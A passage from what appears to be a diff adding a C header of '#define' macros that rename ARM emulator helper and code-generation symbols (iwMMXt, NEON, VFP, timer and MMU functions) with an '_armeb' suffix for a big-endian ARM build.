gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_armeb +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_armeb +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_armeb +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_armeb +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_armeb +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_armeb +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_armeb +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_armeb +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_armeb +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_armeb +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_armeb +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_armeb +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_armeb +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_armeb +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_armeb +#define gen_op_iwmmxt_sadw_M0_wRn 
gen_op_iwmmxt_sadw_M0_wRn_armeb +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_armeb +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_armeb +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_armeb +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_armeb +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_armeb +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_armeb +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_armeb +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_armeb +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_armeb +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_armeb +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_armeb +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_armeb +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_armeb +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_armeb +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_armeb +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_armeb +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_armeb +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_armeb +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_armeb +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_armeb +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_armeb +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_armeb +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_armeb +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_armeb +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_armeb +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_armeb +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_armeb +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_armeb +#define 
gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_armeb +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_armeb +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_armeb +#define gen_rev16 gen_rev16_armeb +#define gen_revsh gen_revsh_armeb +#define gen_rfe gen_rfe_armeb +#define gen_sar gen_sar_armeb +#define gen_sbc_CC gen_sbc_CC_armeb +#define gen_sbfx gen_sbfx_armeb +#define gen_set_CF_bit31 gen_set_CF_bit31_armeb +#define gen_set_condexec gen_set_condexec_armeb +#define gen_set_cpsr gen_set_cpsr_armeb +#define gen_set_label gen_set_label_armeb +#define gen_set_pc_im gen_set_pc_im_armeb +#define gen_set_psr gen_set_psr_armeb +#define gen_set_psr_im gen_set_psr_im_armeb +#define gen_shl gen_shl_armeb +#define gen_shr gen_shr_armeb +#define gen_smc gen_smc_armeb +#define gen_smul_dual gen_smul_dual_armeb +#define gen_srs gen_srs_armeb +#define gen_ss_advance gen_ss_advance_armeb +#define gen_step_complete_exception gen_step_complete_exception_armeb +#define gen_store_exclusive gen_store_exclusive_armeb +#define gen_storeq_reg gen_storeq_reg_armeb +#define gen_sub_carry gen_sub_carry_armeb +#define gen_sub_CC gen_sub_CC_armeb +#define gen_subq_msw gen_subq_msw_armeb +#define gen_swap_half gen_swap_half_armeb +#define gen_thumb2_data_op gen_thumb2_data_op_armeb +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_armeb +#define gen_ubfx gen_ubfx_armeb +#define gen_vfp_abs gen_vfp_abs_armeb +#define gen_vfp_add gen_vfp_add_armeb +#define gen_vfp_cmp gen_vfp_cmp_armeb +#define gen_vfp_cmpe gen_vfp_cmpe_armeb +#define gen_vfp_div gen_vfp_div_armeb +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_armeb +#define gen_vfp_F1_mul gen_vfp_F1_mul_armeb +#define gen_vfp_F1_neg gen_vfp_F1_neg_armeb +#define gen_vfp_ld gen_vfp_ld_armeb +#define gen_vfp_mrs gen_vfp_mrs_armeb +#define gen_vfp_msr gen_vfp_msr_armeb +#define gen_vfp_mul gen_vfp_mul_armeb +#define gen_vfp_neg gen_vfp_neg_armeb +#define gen_vfp_shto gen_vfp_shto_armeb +#define 
gen_vfp_sito gen_vfp_sito_armeb +#define gen_vfp_slto gen_vfp_slto_armeb +#define gen_vfp_sqrt gen_vfp_sqrt_armeb +#define gen_vfp_st gen_vfp_st_armeb +#define gen_vfp_sub gen_vfp_sub_armeb +#define gen_vfp_tosh gen_vfp_tosh_armeb +#define gen_vfp_tosi gen_vfp_tosi_armeb +#define gen_vfp_tosiz gen_vfp_tosiz_armeb +#define gen_vfp_tosl gen_vfp_tosl_armeb +#define gen_vfp_touh gen_vfp_touh_armeb +#define gen_vfp_toui gen_vfp_toui_armeb +#define gen_vfp_touiz gen_vfp_touiz_armeb +#define gen_vfp_toul gen_vfp_toul_armeb +#define gen_vfp_uhto gen_vfp_uhto_armeb +#define gen_vfp_uito gen_vfp_uito_armeb +#define gen_vfp_ulto gen_vfp_ulto_armeb +#define get_arm_cp_reginfo get_arm_cp_reginfo_armeb +#define get_clock get_clock_armeb +#define get_clock_realtime get_clock_realtime_armeb +#define get_constraint_priority get_constraint_priority_armeb +#define get_float_exception_flags get_float_exception_flags_armeb +#define get_float_rounding_mode get_float_rounding_mode_armeb +#define get_fpstatus_ptr get_fpstatus_ptr_armeb +#define get_level1_table_address get_level1_table_address_armeb +#define get_mem_index get_mem_index_armeb +#define get_next_param_value get_next_param_value_armeb +#define get_opt_name get_opt_name_armeb +#define get_opt_value get_opt_value_armeb +#define get_page_addr_code get_page_addr_code_armeb +#define get_param_value get_param_value_armeb +#define get_phys_addr get_phys_addr_armeb +#define get_phys_addr_lpae get_phys_addr_lpae_armeb +#define get_phys_addr_mpu get_phys_addr_mpu_armeb +#define get_phys_addr_v5 get_phys_addr_v5_armeb +#define get_phys_addr_v6 get_phys_addr_v6_armeb +#define get_system_memory get_system_memory_armeb +#define get_ticks_per_sec get_ticks_per_sec_armeb +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_armeb +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__armeb +#define gt_cntfrq_access gt_cntfrq_access_armeb +#define gt_cnt_read gt_cnt_read_armeb +#define gt_cnt_reset gt_cnt_reset_armeb +#define 
gt_counter_access gt_counter_access_armeb +#define gt_ctl_write gt_ctl_write_armeb +#define gt_cval_write gt_cval_write_armeb +#define gt_get_countervalue gt_get_countervalue_armeb +#define gt_pct_access gt_pct_access_armeb +#define gt_ptimer_access gt_ptimer_access_armeb +#define gt_recalc_timer gt_recalc_timer_armeb +#define gt_timer_access gt_timer_access_armeb +#define gt_tval_read gt_tval_read_armeb +#define gt_tval_write gt_tval_write_armeb +#define gt_vct_access gt_vct_access_armeb +#define gt_vtimer_access gt_vtimer_access_armeb +#define guest_phys_blocks_free guest_phys_blocks_free_armeb +#define guest_phys_blocks_init guest_phys_blocks_init_armeb +#define handle_vcvt handle_vcvt_armeb +#define handle_vminmaxnm handle_vminmaxnm_armeb +#define handle_vrint handle_vrint_armeb +#define handle_vsel handle_vsel_armeb +#define has_help_option has_help_option_armeb +#define have_bmi1 have_bmi1_armeb +#define have_bmi2 have_bmi2_armeb +#define hcr_write hcr_write_armeb +#define helper_access_check_cp_reg helper_access_check_cp_reg_armeb +#define helper_add_saturate helper_add_saturate_armeb +#define helper_add_setq helper_add_setq_armeb +#define helper_add_usaturate helper_add_usaturate_armeb +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_armeb +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_armeb +#define helper_be_ldq_mmu helper_be_ldq_mmu_armeb +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_armeb +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_armeb +#define helper_be_ldul_mmu helper_be_ldul_mmu_armeb +#define helper_be_lduw_mmu helper_be_lduw_mmu_armeb +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_armeb +#define helper_be_stl_mmu helper_be_stl_mmu_armeb +#define helper_be_stq_mmu helper_be_stq_mmu_armeb +#define helper_be_stw_mmu helper_be_stw_mmu_armeb +#define helper_clear_pstate_ss helper_clear_pstate_ss_armeb +#define helper_clz_arm helper_clz_arm_armeb +#define helper_cpsr_read helper_cpsr_read_armeb +#define helper_cpsr_write helper_cpsr_write_armeb 
+#define helper_crc32_arm helper_crc32_arm_armeb +#define helper_crc32c helper_crc32c_armeb +#define helper_crypto_aese helper_crypto_aese_armeb +#define helper_crypto_aesmc helper_crypto_aesmc_armeb +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_armeb +#define helper_crypto_sha1h helper_crypto_sha1h_armeb +#define helper_crypto_sha1su1 helper_crypto_sha1su1_armeb +#define helper_crypto_sha256h helper_crypto_sha256h_armeb +#define helper_crypto_sha256h2 helper_crypto_sha256h2_armeb +#define helper_crypto_sha256su0 helper_crypto_sha256su0_armeb +#define helper_crypto_sha256su1 helper_crypto_sha256su1_armeb +#define helper_dc_zva helper_dc_zva_armeb +#define helper_double_saturate helper_double_saturate_armeb +#define helper_exception_internal helper_exception_internal_armeb +#define helper_exception_return helper_exception_return_armeb +#define helper_exception_with_syndrome helper_exception_with_syndrome_armeb +#define helper_get_cp_reg helper_get_cp_reg_armeb +#define helper_get_cp_reg64 helper_get_cp_reg64_armeb +#define helper_get_r13_banked helper_get_r13_banked_armeb +#define helper_get_user_reg helper_get_user_reg_armeb +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_armeb +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_armeb +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_armeb +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_armeb +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_armeb +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_armeb +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_armeb +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_armeb +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_armeb +#define helper_iwmmxt_addub helper_iwmmxt_addub_armeb +#define helper_iwmmxt_addul helper_iwmmxt_addul_armeb +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_armeb +#define helper_iwmmxt_align helper_iwmmxt_align_armeb +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_armeb +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_armeb +#define 
helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_armeb +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_armeb +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_armeb +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_armeb +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_armeb +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_armeb +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_armeb +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_armeb +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_armeb +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_armeb +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_armeb +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_armeb +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_armeb +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_armeb +#define helper_iwmmxt_insr helper_iwmmxt_insr_armeb +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_armeb +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_armeb +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_armeb +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_armeb +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_armeb +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_armeb +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_armeb +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_armeb +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_armeb +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_armeb +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_armeb +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_armeb +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_armeb +#define helper_iwmmxt_minub helper_iwmmxt_minub_armeb +#define helper_iwmmxt_minul helper_iwmmxt_minul_armeb +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_armeb +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_armeb +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_armeb +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_armeb +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_armeb +#define helper_iwmmxt_muladdsw 
helper_iwmmxt_muladdsw_armeb +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_armeb +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_armeb +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_armeb +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_armeb +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_armeb +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_armeb +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_armeb +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_armeb +#define helper_iwmmxt_packul helper_iwmmxt_packul_armeb +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_armeb +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_armeb +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_armeb +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_armeb +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_armeb +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_armeb +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_armeb +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_armeb +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_armeb +#define helper_iwmmxt_slll helper_iwmmxt_slll_armeb +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_armeb +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_armeb +#define helper_iwmmxt_sral helper_iwmmxt_sral_armeb +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_armeb +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_armeb +#define helper_iwmmxt_srll helper_iwmmxt_srll_armeb +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_armeb +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_armeb +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_armeb +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_armeb +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_armeb +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_armeb +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_armeb +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_armeb +#define helper_iwmmxt_subub helper_iwmmxt_subub_armeb +#define helper_iwmmxt_subul helper_iwmmxt_subul_armeb +#define helper_iwmmxt_subuw 
helper_iwmmxt_subuw_armeb +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_armeb +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_armeb +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_armeb +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_armeb +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_armeb +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_armeb +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_armeb +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_armeb +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_armeb +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_armeb +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_armeb +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_armeb +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_armeb +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_armeb +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_armeb +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_armeb +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_armeb +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_armeb +#define helper_ldb_cmmu helper_ldb_cmmu_armeb +#define helper_ldb_mmu helper_ldb_mmu_armeb +#define helper_ldl_cmmu helper_ldl_cmmu_armeb +#define helper_ldl_mmu helper_ldl_mmu_armeb +#define helper_ldq_cmmu helper_ldq_cmmu_armeb +#define helper_ldq_mmu helper_ldq_mmu_armeb +#define helper_ldw_cmmu helper_ldw_cmmu_armeb +#define helper_ldw_mmu helper_ldw_mmu_armeb +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_armeb +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_armeb +#define helper_le_ldq_mmu helper_le_ldq_mmu_armeb +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_armeb +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_armeb +#define helper_le_ldul_mmu helper_le_ldul_mmu_armeb +#define helper_le_lduw_mmu helper_le_lduw_mmu_armeb +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_armeb +#define helper_le_stl_mmu helper_le_stl_mmu_armeb +#define 
helper_le_stq_mmu helper_le_stq_mmu_armeb +#define helper_le_stw_mmu helper_le_stw_mmu_armeb +#define helper_msr_i_pstate helper_msr_i_pstate_armeb +#define helper_neon_abd_f32 helper_neon_abd_f32_armeb +#define helper_neon_abdl_s16 helper_neon_abdl_s16_armeb +#define helper_neon_abdl_s32 helper_neon_abdl_s32_armeb +#define helper_neon_abdl_s64 helper_neon_abdl_s64_armeb +#define helper_neon_abdl_u16 helper_neon_abdl_u16_armeb +#define helper_neon_abdl_u32 helper_neon_abdl_u32_armeb +#define helper_neon_abdl_u64 helper_neon_abdl_u64_armeb +#define helper_neon_abd_s16 helper_neon_abd_s16_armeb +#define helper_neon_abd_s32 helper_neon_abd_s32_armeb +#define helper_neon_abd_s8 helper_neon_abd_s8_armeb +#define helper_neon_abd_u16 helper_neon_abd_u16_armeb +#define helper_neon_abd_u32 helper_neon_abd_u32_armeb +#define helper_neon_abd_u8 helper_neon_abd_u8_armeb +#define helper_neon_abs_s16 helper_neon_abs_s16_armeb +#define helper_neon_abs_s8 helper_neon_abs_s8_armeb +#define helper_neon_acge_f32 helper_neon_acge_f32_armeb +#define helper_neon_acge_f64 helper_neon_acge_f64_armeb +#define helper_neon_acgt_f32 helper_neon_acgt_f32_armeb +#define helper_neon_acgt_f64 helper_neon_acgt_f64_armeb +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_armeb +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_armeb +#define helper_neon_addl_u16 helper_neon_addl_u16_armeb +#define helper_neon_addl_u32 helper_neon_addl_u32_armeb +#define helper_neon_add_u16 helper_neon_add_u16_armeb +#define helper_neon_add_u8 helper_neon_add_u8_armeb +#define helper_neon_ceq_f32 helper_neon_ceq_f32_armeb +#define helper_neon_ceq_u16 helper_neon_ceq_u16_armeb +#define helper_neon_ceq_u32 helper_neon_ceq_u32_armeb +#define helper_neon_ceq_u8 helper_neon_ceq_u8_armeb +#define helper_neon_cge_f32 helper_neon_cge_f32_armeb +#define helper_neon_cge_s16 helper_neon_cge_s16_armeb +#define helper_neon_cge_s32 helper_neon_cge_s32_armeb +#define helper_neon_cge_s8 
helper_neon_cge_s8_armeb +#define helper_neon_cge_u16 helper_neon_cge_u16_armeb +#define helper_neon_cge_u32 helper_neon_cge_u32_armeb +#define helper_neon_cge_u8 helper_neon_cge_u8_armeb +#define helper_neon_cgt_f32 helper_neon_cgt_f32_armeb +#define helper_neon_cgt_s16 helper_neon_cgt_s16_armeb +#define helper_neon_cgt_s32 helper_neon_cgt_s32_armeb +#define helper_neon_cgt_s8 helper_neon_cgt_s8_armeb +#define helper_neon_cgt_u16 helper_neon_cgt_u16_armeb +#define helper_neon_cgt_u32 helper_neon_cgt_u32_armeb +#define helper_neon_cgt_u8 helper_neon_cgt_u8_armeb +#define helper_neon_cls_s16 helper_neon_cls_s16_armeb +#define helper_neon_cls_s32 helper_neon_cls_s32_armeb +#define helper_neon_cls_s8 helper_neon_cls_s8_armeb +#define helper_neon_clz_u16 helper_neon_clz_u16_armeb +#define helper_neon_clz_u8 helper_neon_clz_u8_armeb +#define helper_neon_cnt_u8 helper_neon_cnt_u8_armeb +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_armeb +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_armeb +#define helper_neon_hadd_s16 helper_neon_hadd_s16_armeb +#define helper_neon_hadd_s32 helper_neon_hadd_s32_armeb +#define helper_neon_hadd_s8 helper_neon_hadd_s8_armeb +#define helper_neon_hadd_u16 helper_neon_hadd_u16_armeb +#define helper_neon_hadd_u32 helper_neon_hadd_u32_armeb +#define helper_neon_hadd_u8 helper_neon_hadd_u8_armeb +#define helper_neon_hsub_s16 helper_neon_hsub_s16_armeb +#define helper_neon_hsub_s32 helper_neon_hsub_s32_armeb +#define helper_neon_hsub_s8 helper_neon_hsub_s8_armeb +#define helper_neon_hsub_u16 helper_neon_hsub_u16_armeb +#define helper_neon_hsub_u32 helper_neon_hsub_u32_armeb +#define helper_neon_hsub_u8 helper_neon_hsub_u8_armeb +#define helper_neon_max_s16 helper_neon_max_s16_armeb +#define helper_neon_max_s32 helper_neon_max_s32_armeb +#define helper_neon_max_s8 helper_neon_max_s8_armeb +#define helper_neon_max_u16 helper_neon_max_u16_armeb +#define helper_neon_max_u32 helper_neon_max_u32_armeb +#define 
helper_neon_max_u8 helper_neon_max_u8_armeb +#define helper_neon_min_s16 helper_neon_min_s16_armeb +#define helper_neon_min_s32 helper_neon_min_s32_armeb +#define helper_neon_min_s8 helper_neon_min_s8_armeb +#define helper_neon_min_u16 helper_neon_min_u16_armeb +#define helper_neon_min_u32 helper_neon_min_u32_armeb +#define helper_neon_min_u8 helper_neon_min_u8_armeb +#define helper_neon_mull_p8 helper_neon_mull_p8_armeb +#define helper_neon_mull_s16 helper_neon_mull_s16_armeb +#define helper_neon_mull_s8 helper_neon_mull_s8_armeb +#define helper_neon_mull_u16 helper_neon_mull_u16_armeb +#define helper_neon_mull_u8 helper_neon_mull_u8_armeb +#define helper_neon_mul_p8 helper_neon_mul_p8_armeb +#define helper_neon_mul_u16 helper_neon_mul_u16_armeb +#define helper_neon_mul_u8 helper_neon_mul_u8_armeb +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_armeb +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_armeb +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_armeb +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_armeb +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_armeb +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_armeb +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_armeb +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_armeb +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_armeb +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_armeb +#define helper_neon_narrow_u16 helper_neon_narrow_u16_armeb +#define helper_neon_narrow_u8 helper_neon_narrow_u8_armeb +#define helper_neon_negl_u16 helper_neon_negl_u16_armeb +#define helper_neon_negl_u32 helper_neon_negl_u32_armeb +#define helper_neon_paddl_u16 helper_neon_paddl_u16_armeb +#define helper_neon_paddl_u32 helper_neon_paddl_u32_armeb +#define helper_neon_padd_u16 helper_neon_padd_u16_armeb +#define helper_neon_padd_u8 helper_neon_padd_u8_armeb +#define 
helper_neon_pmax_s16 helper_neon_pmax_s16_armeb +#define helper_neon_pmax_s8 helper_neon_pmax_s8_armeb +#define helper_neon_pmax_u16 helper_neon_pmax_u16_armeb +#define helper_neon_pmax_u8 helper_neon_pmax_u8_armeb +#define helper_neon_pmin_s16 helper_neon_pmin_s16_armeb +#define helper_neon_pmin_s8 helper_neon_pmin_s8_armeb +#define helper_neon_pmin_u16 helper_neon_pmin_u16_armeb +#define helper_neon_pmin_u8 helper_neon_pmin_u8_armeb +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_armeb +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_armeb +#define helper_neon_qabs_s16 helper_neon_qabs_s16_armeb +#define helper_neon_qabs_s32 helper_neon_qabs_s32_armeb +#define helper_neon_qabs_s64 helper_neon_qabs_s64_armeb +#define helper_neon_qabs_s8 helper_neon_qabs_s8_armeb +#define helper_neon_qadd_s16 helper_neon_qadd_s16_armeb +#define helper_neon_qadd_s32 helper_neon_qadd_s32_armeb +#define helper_neon_qadd_s64 helper_neon_qadd_s64_armeb +#define helper_neon_qadd_s8 helper_neon_qadd_s8_armeb +#define helper_neon_qadd_u16 helper_neon_qadd_u16_armeb +#define helper_neon_qadd_u32 helper_neon_qadd_u32_armeb +#define helper_neon_qadd_u64 helper_neon_qadd_u64_armeb +#define helper_neon_qadd_u8 helper_neon_qadd_u8_armeb +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_armeb +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_armeb +#define helper_neon_qneg_s16 helper_neon_qneg_s16_armeb +#define helper_neon_qneg_s32 helper_neon_qneg_s32_armeb +#define helper_neon_qneg_s64 helper_neon_qneg_s64_armeb +#define helper_neon_qneg_s8 helper_neon_qneg_s8_armeb +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_armeb +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_armeb +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_armeb +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_armeb +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_armeb +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_armeb +#define helper_neon_qrshl_u16 
